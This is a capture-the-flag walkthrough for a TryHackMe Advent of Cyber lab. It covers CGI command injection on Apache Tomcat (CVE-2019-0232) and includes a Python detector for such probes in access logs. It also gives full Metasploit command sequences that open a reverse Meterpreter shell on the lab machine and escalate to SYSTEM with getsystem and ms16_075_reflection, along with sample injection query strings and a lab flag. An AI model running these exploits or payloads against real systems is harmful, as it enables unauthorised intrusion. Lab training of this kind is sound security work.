Day 12 - Ready, set, elf
Date: 12, December, 2020
Author: Dhilip Sanjay S
Learning Objectives
Common Gateway Interface (CGI)
CGI is the standard interface through which a web server hands a client's request (from a browser, for example) to an external program and returns that program's output as the response. CGI scripts are conventionally kept in the `/cgi-bin/` directory. Example: a script `systeminfo.sh` that shows the date and time.

If the server passes the query string to the script as command-line arguments, appending `?&<command>` to the script's URL lets you check whether your command is executed and its output returned. Commands to try: on Linux, `ls`; on Windows, `systeminfo`. The `&` matters because a Windows CGI script is launched through `cmd.exe`, which treats `&` as a command separator, so whatever follows it runs as a second command.

Note: special characters in the injected command are URL-encoded in the request (a space in a command, for instance, will not appear literally in the URL).
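As an added example (this code is not from the original write-up or from TryHackMe), the following Python models how Tomcat's CGI servlet turns a query string into command-line arguments when `enableCmdLineArguments` is on, why `?&<command>` gets a second command executed by `cmd.exe` on Windows, and how to spot such probes in an access log. The helper names, `CMD_SEPARATORS` and the log lines are constructed for the example; the splitting rule it applies (a query with no `=` is split on `+` and each piece URL-decoded into one argument) is the behaviour the servlet is documented to have, simplified by ignoring the quoting Java applies to arguments that contain spaces.

```python
"""Model of CGI command-line argument handling behind CVE-2019-0232.

Added example, not code from the original write-up. Helper names and the
sample log lines are this example's own constructions.
"""
import re
from urllib.parse import unquote


def query_to_cgi_args(query):
    """Return the argv a CGI servlet with command-line arguments enabled
    would pass to the script, or [] when it would pass none.

    Rule as Tomcat applies it: a query string containing no '=' is treated
    as a search string, split on '+', and each piece is URL-decoded into
    one argument. Any '=' means form data, which only goes into the
    QUERY_STRING environment variable and never onto the command line.
    """
    if not query or "=" in query:
        return []
    return [unquote(tok) for tok in query.split("+") if tok]


# cmd.exe treats these characters as boundaries between commands.
CMD_SEPARATORS = "&|"


def injected_commands(query):
    """Commands cmd.exe would run in addition to the CGI script itself.

    On Windows the .bat script is launched through `cmd.exe /c`, so the
    argument list is appended to the script's command line. Everything
    after the first separator is a new command. Argument quoting is
    ignored here (assumption for the model).
    """
    cmdline = " ".join(query_to_cgi_args(query))
    parts = re.split("[" + re.escape(CMD_SEPARATORS) + "]", cmdline)
    # parts[0] belongs to the script's own command; the rest are injected.
    return [p.strip() for p in parts[1:] if p.strip()]


def is_cgi_injection_attempt(log_line):
    """Flag an access-log line whose request targets /cgi-bin/ with a
    query string that would reach the command line and carries a
    separator (the line is expected in common log format)."""
    try:
        request = log_line.split('"')[1]   # e.g. 'GET /path?qs HTTP/1.1'
        path = request.split(" ")[1]
    except IndexError:
        return False
    if "/cgi-bin/" not in path or "?" not in path:
        return False
    return bool(injected_commands(path.split("?", 1)[1]))


# Constructed sample log lines; the last one hides '&' as '%26', which a
# rule matching only a literal '&' in the raw request would miss.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2020:10:00:01 +0000] "GET /cgi-bin/elfwhacker.bat HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Dec/2020:10:00:07 +0000] "GET /cgi-bin/elfwhacker.bat?name=elf HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Dec/2020:10:00:12 +0000] "GET /cgi-bin/elfwhacker.bat?&systeminfo HTTP/1.1" 200 4096',
    '10.0.0.9 - - [12/Dec/2020:10:00:15 +0000] "GET /cgi-bin/elfwhacker.bat?%26dir+c:\\ HTTP/1.1" 200 2048',
]


def flagged_requests(lines=SAMPLE_LOG):
    """Return the log lines that look like CGI command injection probes."""
    return [line for line in lines if is_cgi_injection_attempt(line)]


if __name__ == "__main__":
    for line in flagged_requests():
        path = line.split('"')[1].split(" ")[1]
        query = path.split("?", 1)[1]
        print(path, "->", injected_commands(query))
```

Because the separator is only recognised after URL-decoding, detection has to decode the query string the same way the servlet does, which is why `%26dir` is flagged here as firmly as `&systeminfo`.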
Solutions
What is the version number of the web server?
Answer: 9.0.17
Steps to Reproduce: Run `nmap -sV -p 8080 <MACHINE_IP>` (the `-sV` flag grabs the service banner), or open `http://<MACHINE_IP>:8080` in a browser; the default Tomcat landing page states the version.
What CVE can be used to create a Meterpreter entry onto the machine?
Answer: CVE-2019-0232 (Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit))
Steps to Reproduce: Search for `Apache Tomcat 9.0` in `msfconsole` (Metasploit) or on Exploit-DB and pick the Windows entry. The vulnerability is specific to Tomcat on Windows with the CGI servlet's `enableCmdLineArguments` option turned on; it affects 9.0.0.M1 through 9.0.17, which matches the version found above. The query string is passed to the CGI script as `cmd.exe` arguments without adequate validation. The Metasploit module is `exploit/windows/http/tomcat_cgi_cmdlineargs`.
What are the contents of flag1.txt?
Answer: thm{whacking_all_the_elves}
Steps to Reproduce:

```
msf6 > search apache tomcat 9.0
msf6 > use 0
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > set LHOST <Your_TryHackMe_IP>
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > set RHOSTS <MACHINE_IP>
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > set TARGETURI /cgi-bin/elfwhacker.bat
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > options
msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > run
```

`use 0` selects the first search result; the index depends on your module database, so confirm from the prompt (or with `info`) that the CGIServlet enableCmdLineArguments module is the one loaded. `LHOST` is your TryHackMe VPN address (the `tun0` interface). Verify the settings with `options`, then type `run`; a Meterpreter session opens. Drop into a command shell on the target with:

```
meterpreter > shell
```

To view the flag:

```
type flag1.txt
```
Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!
Privilege Escalation:
1. Using the `getsystem` command
Run `getuid` before and after to confirm the change (the original post shows screenshots of the session before escalation, the `getsystem` run, and the session after escalation):

```
meterpreter > getuid
meterpreter > getsystem
meterpreter > getuid
```

2. Using local exploits
If `getsystem` fails, run the command shown in the original post (a screenshot not reproduced here) to enumerate candidate local exploits. Of those, only `exploit/windows/local/ms16_075_reflection` worked for privilege escalation. Move the current Meterpreter session to the background, load that exploit, set its options including `SESSION` (find the id with `sessions -l`), then run it with `exploit`:

```
meterpreter > background
msf6 > use exploit/windows/local/ms16_075_reflection
msf6 exploit(windows/local/ms16_075_reflection) > set SESSION <session_id>
msf6 exploit(windows/local/ms16_075_reflection) > set LHOST <Your_TryHackMe_IP>
msf6 exploit(windows/local/ms16_075_reflection) > exploit
```

A new session opens with an elevated (administrator-level) shell; verify with `getuid`.